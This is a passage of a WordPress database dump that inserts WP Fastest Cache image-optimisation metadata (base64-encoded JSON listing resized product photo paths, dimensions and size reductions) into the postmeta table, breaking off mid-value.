INSERT INTO `wp_postmeta` VALUES (28987, 1922, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy5qcGciLCJ3aWR0aCI6Mzg4OCwiaGVpZ2h0IjoyNDkyLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMuanBnIiwicmVkdWN0aW9uIjoxMjQzMDMxLCJ0aW1lIjoxNDgzNTUxNDU3LCJpZCI6IjE5MjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTQ1OSwiaWQiOjE5MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtODAweDUxMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy04MDB4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTgwMHg1MTMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNDYyLCJpZCI6MTkyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy03Njh4NDkyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDkyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTc2OHg0OTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtNzY4eDQ5Mi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE0NjcsImlkIjoxOTIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTE2MDB4MTAyNi5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDI2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTE2MDB4MTAyNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0xNjAweDEwMjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNDcxLCJpZCI6MTkyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE0NzMsImlkIjoxOTIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTQ3NSwiaWQiOjE5MjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNDc4LCJpZCI6MTkyMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTE0ODAsImlkIjoxOTIyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxNDgzLCJpZCI6MTkyMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NwZWNpYWx0eS1wcm9kdWN0cy0zLTQ1MHgyODguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc3BlY2lhbHR5LXByb2R1Y3RzLTMtNDUweDI4OC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI4OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zcGVjaWFsdHktcHJvZHVjdHMtMy00NTB4Mjg4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTQ4NiwiaWQiOjE5MjJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28988, 1921, 'wpfc_optimisation_reduction', '13631'); 
INSERT INTO `wp_postmeta` VALUES (28989, 1921, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy5qcGciLCJ3aWR0aCI6NzM2MCwiaGVpZ2h0Ijo0OTEyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUxNDkwLCJpZCI6IjE5MjEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODk5LCJ0aW1lIjoxNDgzNTUxNDk0LCJpZCI6MTkyMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtODAweDUzNC5qcGciLCJyZWR1Y3Rpb24iOjE4OTIsInRpbWUiOjE0ODM1NTE0OTgsImlkIjoxOTIxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtNzY4eDUxMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6MTk0MiwidGltZSI6MTQ4MzU1MTUwMiwiaWQiOjE5MjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTE2MDB4MTA2OC5qcGciLCJyZWR1Y3Rpb24iOjM3MzIsInRpbWUiOjE0ODM1NTE1MDgsImlkIjoxOTIxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NzA1LCJ0aW1lIjoxNDgzNTUxNTExLCJpZCI6MTkyMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzMywidGltZSI6MTQ4MzU1MTUxNCwiaWQiOjE5MjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2NDUsInRpbWUiOjE0ODM1NTE1MTgsImlkIjoxOTIxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTQyNiwidGltZSI6MTQ4MzU1MTUyMiwiaWQiOjE5MjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjc4NywidGltZSI6MTQ4MzU1MTUyNSwiaWQiOjE5MjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXNlLWFnZW50cy1wcm9kdWN0cy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc2UtYWdlbnRzLXByb2R1Y3RzLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzZS1hZ2VudHMtcHJvZHVjdHMtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNzAsInRpbWUiOjE0ODM1NTE1MjksImlkIjoxOTIxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28990, 1920, 'wpfc_optimisation_reduction', '21649'); 
INSERT INTO `wp_postmeta` VALUES (28991, 1920, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTUzMywiaWQiOiIxOTIwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0MywidGltZSI6MTQ4MzU1MTUzNywiaWQiOjE5MjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNzQ4LCJ0aW1lIjoxNDgzNTUxNTQwLCJpZCI6MTkyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTEtRVBPWFktU1RSSVBQSU5HLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTExLUVQT1hZLVNUUklQUElORy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExMS1FUE9YWS1TVFJJUFBJTkctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI0MjYsInRpbWUiOjE0O